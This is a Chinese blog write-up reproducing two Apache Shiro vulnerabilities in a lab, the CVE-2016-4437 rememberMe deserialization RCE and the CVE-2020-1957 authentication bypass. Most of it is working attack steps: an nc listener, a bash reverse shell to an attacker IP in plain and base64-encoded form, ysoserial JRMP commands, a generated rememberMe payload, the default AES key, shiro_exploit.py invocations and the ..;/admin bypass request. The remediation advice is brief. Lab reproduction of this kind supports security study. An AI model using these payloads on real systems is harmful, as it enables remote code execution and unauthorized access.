【漏洞复现】Apache系列(一)之Shiro漏洞复现

最新推荐文章于 2024-08-01 15:05:06 发布
最新推荐文章于 2024-08-01 15:05:06 发布
阅读量1k 收藏 5
点赞数
分类专栏: java 文章标签: java 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/web18224617243/article/details/124465147
版权

文章目录

Apache Shiro550反序列化(CVE-2016-4437)漏洞复现

一、漏洞描述

Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,您可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序。只要rememberMe的AES加密秘钥泄露,无论shiro是什么版本都会导致反序列化漏洞。

二、漏洞原理

Apache Shiro框架提供了记住我(RememberMe)的功能,关闭了浏览器下次再打开时还是能记住你是谁,下次访问时无需再登录即可访问。Shiro对rememberMe的cookie做了加密处理,shiro在CookieRememberMeManager类中将cookie中rememberMe字段内容分别进行序列化、AES加密、Base64编码操作。

原因分析:Apache Shiro默认使用了CookieRememberMeManager,其处理cookie的流程是:得到rememberMe的cookie值 > Base64解码–>AES解密–>反序列化。然而AES的密钥是硬编码的,就导致了攻击者可以构造恶意数据造成反序列化的RCE漏洞

漏洞特征:shiro反序列化的特征:在返回包的Set-Cookie 中存在rememberMe=deleteMe 字段

三、影响版本

Shiro<=1.2.4版本,当未设置用于"remember me”特性的AES密钥时,存在反序列化漏洞,可远程命令执行。

四、(1)复现过程-使用ysoserial工具复现

项目地址:https://github.com/frohoff/ysoserial

0.环境说明

攻击机:192.168.102.181
目标机:192.168.37.128

1.使用Docker起CVE-2016-4437环境

访问8080端口查看环境是否正常实例化

cd vulhub/shiro/CVE-2016-4437
docker-compose up -d

image.png
image.png

2.使用nc监听本机端口

nc -lvvp 8899

image.png

3.将Bash反弹Shell的Code进行Base64加密

bash -i >& /dev/tcp/192.168.102.181/8899 0>&1

编码后:
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwMi4xODEvODg5OSAwPiYx}|{base64,-d}|{bash,-i}

4.使用ysoserial.jar的JRMP本地监听映射模块

使用CommonsCollections5,本地端口监听转发为7777 (注:bash加密命令前的CommonsCollections后面数字要写5,网上的payload都写CommonsCollections4,可能是Java环境问题,CommonsCollections4一直反弹不到shell,只在Java端口监听到会话,可使用CommonsCollections1,2,3,4,5等各种方式进行测试,所以尝试更改了CommonsCollections就有效果了)

java -cp ysoserial.jar ysoserial.exploit.JRMPListener 7777 CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwMi4xODEvODg5OSAwPiYx}|{base64,-d}|{bash,-i}"

image.png

5.生成一次性RememberMe的值

使用Shiro550的EXP去生成一个临时并且一次性的RememberMe的值,IP是攻击机的ip,端口是JRMP映射出的端口
image.png
获得

rememberMe=nvy4OxP9ReyqQ7vzWKQZFMZcjbE0+tEt220EfbG1tIYjr0PuMfkHvRxfSHPLpfAsMfCw5n5jtxaRsHPRjpkBawHYb5fmvu35THT85HxjJRWFov5d0UP4JD/5f8s2cHlUeWO0X0W1z8hjw/M+0LjhLz6ck86cwvThBpaCjkpPS8PZeF8yi6BYszv2RGDUVOX7I9TuQKXD5vX4993qwwh7pRKuzDpCbeqKhtPCYUG/Xp3XIYmTrvtSxwTqtixcyFzAygXC1vwSudnXO9XU/iADBKd6MBIaMchx5Ss38qQDODdVI4LTarrTRi6irDycnvCWbSHVb7n1uapW6RaABYs3/3V5eqMhUKWt0YlO/qSvg0x4PhKgesAOTfocvopn6s1RtsscbosL+Uvn4YB4kl0Aww==

6.BurpSuite抓取登录的数据包

访问漏洞环境,使用BurpSuite抓取登录的数据包,然后将获取到的rememberMe追加至Cookie后(前面需要加一个;),响应内容的Set-Cookie字段里有rememberMe的key就基本上成功
image.png

7.查看JRMP和NC

返回JRMP监听映射和NC监听转发,查看Shell成功反弹,成功获取目标机权限
image.png
image.png

(2)复现过程-使用Shiro_exploit工具复现

项目地址:https://github.com/insightglacier/Shiro_exploit

0.环境说明

攻击机:192.168.102.181
目标机:192.168.37.128

1.使用命令检测是否存在漏洞

python3 shiro_exploit.py -u http://192.168.37.128:8080/

image.png

出现 vulnerable:True表示存在shiro漏洞 ,并发现了key
image.png

2.使用Shiro_exploit进行反弹shell利用

使用nc监听本机端口

nc -lvvp 8899

image.png

将Bash反弹Shell的Code进行Base64加密

bash -i >& /dev/tcp/192.168.102.181/8899 0>&1

编码后:
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwMi4xODEvODg5OSAwPiYx}|{base64,-d}|{bash,-i}

使用Shiro_exploit进行反弹shell利用

python shiro_exploit.py -t 3 -u 目标url -p "bash加密命令" -k "上面检测出来的key"

python shiro_exploit.py -t 3 -u http://192.168.37.128:8080 -p "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwMi4xODEvODg5OSAwPiYx}|{base64,-d}|{bash,-i}" -k "kPH+bIxk5D2deZiIxcaaaA=="

执行命令并返回NC查看,查看Shell成功反弹,成功获取目标机权限
image.png

(3)复现过程-使用集成化工具复现

image.png

五、修复建议

升级shiro至最新版本

Apache Shiro 认证绕过漏洞(CVE-2020-1957) 漏洞复现

一、漏洞描述

Apache Shiro 是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。Spring Boot中使用 Apache Shiro 进行身份验证、权限控制时,可以精心构造恶意的URL,利用 Apache Shiro 和 Spring Boot 对URL的处理的差异化,可以绕过 Apache Shiro 对 Spring Boot 中的 Servlet 的权限控制,越权并实现未授权访问。

二、漏洞简单分析

请求/xxxxx/…;/admin,在shiro中经过处理变为/xxxxx/…,与过滤器/xxxxx/规则进行匹配通过校验,成功转向后方的Spring Boot。

恶意请求/xxxxx/…;/admin通过Shiro的校验后,传递到Spring Boot中进行解析,根据Controller设置的路由选择对应Servlet,最终形成了对/admin这个Servlet的未授权访问,再返回给攻击者。

三、影响版本

Apache Shiro < 1.5.2

四、复现过程

0.环境说明

目标ip:192.168.37.128

1.使用Docker起CVE-2020-1957环境

执行如下命令

cd vulhub/shiro/CVE-2020-1957
docker-compose up -d

image.png

环境启动后,访问http://192.168.37.128:8080即可查看首页。
image.png
这个应用中对URL权限的配置如下:

@Bean
public ShiroFilterChainDefinition shiroFilterChainDefinition() {
    DefaultShiroFilterChainDefinition chainDefinition = new DefaultShiroFilterChainDefinition();
    chainDefinition.addPathDefinition("/login.html", "authc"); // need to accept POSTs from the login form
    chainDefinition.addPathDefinition("/logout", "logout");
    chainDefinition.addPathDefinition("/admin/**", "authc");
    return chainDefinition;
}

2. 使用BurpSuite抓取数据包

访问/admin/目录 , 回显302并跳转到登录页面
image.png

3.构造恶意请求

构造恶意请求/xxx/…;/admin/,即可绕过权限校验,访问到管理页面
image.png
image.png

4.URL请求过程

  • 客户端请求URL: /xxx/…;/admin/
  • Shrio 内部处理得到校验URL为 /xxxx/…,校验通过
  • SpringBoot 处理 /xxx/…;/admin/ , 最终请求 /admin/, 成功访问了后台请求。

五、修复建议

1.升级1.5.2版本及以上

2.尽量避免使用*通配符作为动态路由拦截器的URL路径表达式。

web18224617243
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Apache Shiro漏洞复现
牟先生的学习博客
09-10 1127
Apache Shiro 认证绕过漏洞 CVE-2020-1957 1. 漏洞描述 Apache Shiro 1.5.2之前版本中存在安全漏洞攻击者可借助特制的请求利用该漏洞绕过身份验证。 Shiro框架通过拦截器功能来对用户访问权限进行控制,如anon, authc等拦截器。anon为匿名拦截器,不需要登录即可访问;authc为登录拦截器,需要登录才可以访问。可以通过构造恶意的URL进行越权实现未授权访问。 2.环境搭建 之前已经搭建过vulhub环境,直接进入vulhub/shiro/CVE-2020
shiro反序列化复现.zip
08-03
2. **测试环境**:可能包含一个预配置的服务器环境,模拟了存在反序列化漏洞Shiro应用,使得用户可以在可控的环境中测试漏洞复现过程。 3. **文档**:解释了如何使用提供的工具和代码,以及漏洞的工作原理和修复...
Apache Shiro 漏洞复现
来日可期的博客
10-10 871
Apache Shiro 1.2.4及以前版本中,Apache Shiro默认使用了CookieRememberMeManager,其处理cookie的流程是:得到rememberMe的cookie值 > Base64解码–>AES解密–>反序列化。在代码中全局搜索 “setCipherKey(Base64.decode(” 关键字,或者"setCipherKey"方法,Base64.decode()中的字符串就是shiro的密钥,要确保该密钥的安全性,千万不要使用公开的密钥。利用Shiro工具进行链接。
shiro反序列化漏洞复现(CVE-2016-4437)
m0_70349048的博客
05-19 408
cookie的key为RememberMe,cookie的值是经过相关信息进行序列化,然后使用AES加密(对称),最后再使用Base64编码处理。,这意味着攻击者只要通过源代码找到AES加密的密钥,就可以构造一个恶意对象,对其进行序列化,AES加密,Base64编码,然后将其作为cookie的Remember Me字段发送,Shiro将RememberMe进行解密并且反序列化,最终造成反序列化漏洞。将生成的payload复制到请求包cookie的位置, 发包。可以看到,已经能够远程执行任意命令了。
漏洞复现Apache_Shiro_1.2.4_反序列化漏洞(CVE-2016-4437)
过期的秋刀鱼
11-05 849
由于使用了aes加密,想要成功利用漏洞则需要获取ase的加密秘钥,而在shiro的1.2.4之前的版本中使用的硬编码。其中默认秘钥的b ase64编码后的值为kPH+bIxk5D2deZiIxcaaaA==,这里就可以通过构造恶意的序列化对象进行编码,加密,然后欧威cooike加密发送,服务端接受后会解密并触发反序列化漏洞。cookie的key为rememberme,cookie的值是经过对相关的信息进行序列化,然后实用aes加密,最后在使用b ase64编码处理形成的。字段,登陆成功的话,返回包。
apache shiro漏洞复现
赵花花08042的博客
12-13 693
Shiro框架下,用户登陆成功后会生成一个经过加密的Cookie。
框架安全-CVE 复现&Apache Shiro&Apache Solr漏洞复现
rumil的博客
11-02 1717
Solr 是一个高性能,采用 Java5 开发。Solr 任意文件读取该漏洞是由于没有对输入的内容进行校验,攻击者可利用该漏洞在未授权的情况下,构造恶意数据执行SSRF攻击,最终造成任意读取服务器上的文件。 中间件:IIS,Apache,Nginx,Tomcat,Docker,K8s,Weblogic,JBoos,WebSphere,Jenkins ,GlassFish,Jetty,Jira,Struts2,Laravel,Solr,Shiro,Thinkphp,Spring,Flask,jQuery 等。
[ 漏洞复现篇 ] Apache Shiro 身份认证绕过漏洞 (CVE-2022-32532)
qq_51577576的博客
08-05 4728
Apache Shiro 是一个强大且易用的 Java 安全框架,通过它可以执行身份验证、授权、密码和会话管理。使用 Shiro 的易用 API,您可以快速、轻松地保护任何应用程序 —— 从最小的移动应用程序到最大的 WEB 和企业应用程序。...
Apache Shiro反序列化(CVE-2016-4437)漏洞复现
m0_55854679的博客
07-31 750
Apache shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。使用Java序列化—>使用密钥进行AES加密—>Base64加密—>得到加密后的RememberMe内容同时在识别用户身份的时候,需要对RememberMe加密内容—>Base64解密—>使用密钥进行AES解密—>Java反序列化问题出在AES加密的密钥Key被硬编码在代码里,这意味着攻击者只要通过源代码找到AES加密的密钥,就可以构造一个恶意对象,对其进行序列化,的将。..
Apache Shiro 1.2.4反序列化漏洞复现
m0_59092234的博客
09-01 254
然后这个时候只要修改一个文件夹的名称PythonPython36Libsite-packages,找到这个路径,下面有一个文件夹叫做crypto,将小写c改成大写C就ok了。Crypto.Cipher模块的错误,Google百度网上找了一大堆,疯狂pip安装卸载,都无法解决,后来采取了手动安装Crypto模块,最后终于解决。发现输入命令后最后出现了如下报错,其实一直都是出现了这个报错,之前只是没有理会。可以使用下面的语句安装pycryptodome这个库。在第一步的时候是安装过的,我们再安装试一次。...
shiro系列漏洞复现shiro550和shiro721漏洞
weixin_53730939的博客
03-27 929
shiro系列漏洞复现shiro550和shiro721漏洞
Apache-Shiro反序列化1
08-03
二、漏洞复现复现漏洞,需要使用 Docker 环境,安装 Apache Shiro 版本,并使用 Burp 工具抓包测试。下面是复现步骤: 1. 安装 Docker 环境,并 pull medicean/vulapps:s_shiro_1 镜像。 2. 运行 Docker 容器...
061-Apache Shiro 反序列化之殇.pdf
09-20
在特定版本(如1.2.4及更早版本)中,Shiro的一个反序列化漏洞成为了黑客攻击的目标。 这个漏洞主要涉及到Shiro的Remember Me功能。Remember Me允许用户在关闭浏览器后仍然保持登录状态,以便下次访问时自动登录。...
ApacheShiro复现记录1
08-08
Apache Shiro复现记录1记录了一个典型的反序列化攻击案例,涉及到了ysoserial.jar工具、JRMPListener、bash反弹shell、base64编码、nc工具、Shiro.py工具、rememberMe Cookie和Apache Shiro漏洞等知识点。
shiro权限绕过漏洞分析(cve-2020-1957) _ Spoock1
08-03
Apache Shiro是一个强大的Java安全框架,它提供了身份验证、授权、加密和会话管理功能,用于简化企业级应用的安全实现。在Spring Boot项目中,Shiro通常被用来控制用户的访问权限。然而,如标题和描述中提到的,存在...
使用hutool工具判断字符串是否全部是字母(包括大小写),java判断字符串是否全部是字母(包括大小写)
qq_43700885的博客
07-29 550
1.导入hutool的maven依赖。2.复制一下代码执行。
社区养老服务小程序的设计
Karen198的博客
07-31 389
管理员账户功能包括:系统首页,个人中心,用户管理,服务人员管理,服务产品管理,服务预约管理,服务状态管理,服务退订管理,活动管理,视频管理。主要技术:Java,Spring,mybatis,mysql,jquery,html。服务器:SpringBoot自带 apache tomcat。微信端账号功能包括:系统首页,服务产品,活动,视频,我的。JDK版本:Java JDK1.8。数据库可视化工具: navicat。数据库版本: mysql5.7。开发工具:IDEA(推荐)开发系统:Windows。
深入理解Java注解
最新发布
weixin_55745942的博客
08-01 374
Java注解是用来描述程序元素(如类、方法、变量等)的一种机制。它们可以提供关于程序的补充信息,帮助编译器、框架或其他工具更好地理解和处理代码。注解通常以符号开头,后跟注解名称和可能的参数。要创建自定义注解,需要使用@interface关键字定义一个接口,并在接口中声明注解的属性。这个注解名为,可以被用来标记方法。它有一个名为value的属性,具有默认值"default"。
shiro反序列化漏洞复现
07-28
Apache Shiro反序列化漏洞是指攻击者可以利用Shiro框架中的反序列化漏洞,通过构造恶意的序列化数据,来执行任意代码或者获取敏感信息的漏洞攻击者可以通过发送恶意请求或者利用其他漏洞来触发该漏洞,从而实现攻击目的。为了防止该漏洞的利用,建议及时更新Shiro框架版本,并加强对系统的安全防护措施。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值